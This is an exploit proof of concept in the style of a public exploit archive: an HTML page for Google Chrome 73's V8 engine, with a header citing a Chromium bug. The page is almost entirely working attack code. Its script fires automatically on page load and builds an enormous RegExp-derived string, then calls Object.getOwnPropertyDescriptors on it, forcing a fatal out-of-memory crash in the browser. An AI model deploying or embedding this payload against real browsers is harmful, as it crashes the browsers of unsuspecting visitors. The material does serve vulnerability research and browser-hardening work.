<!--
# Exploit Title: Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-memory in invalid table size . Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-04-20
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 73.0.3683.103
# Tested on: Windows x64
# CVE : N/A

# Description:
# Fatal javascript OOM in invalid table size
# https://bugs.chromium.org/p/chromium/issues/detail?id=918301
-->

<html>
<head>
<script>

var arr1 = [0,1];

function ObjCreate(make) {
    this.make = make;
}

// Constructed without an argument, so obj1.make starts out undefined.
var obj1 = new ObjCreate();

function main() {
    // f3 runs once as the reduce callback and replaces obj1.make with a RegExp.
    arr1.reduce(f3);
    // Array(99).join(...) uses the RegExp's string form as the separator (98 copies);
    // getOwnPropertyDescriptors then builds a descriptor for every character index
    // of the resulting string.
    Object.getOwnPropertyDescriptors(Array(99).join(obj1.make));
}

function f3() {
    // Pattern is 59999 copies of "CCC" (179,997 characters).
    obj1["make"] = RegExp(Array(60000).join("CCC"));
}

</script>
</head>
<body onload=main()></body>
</html>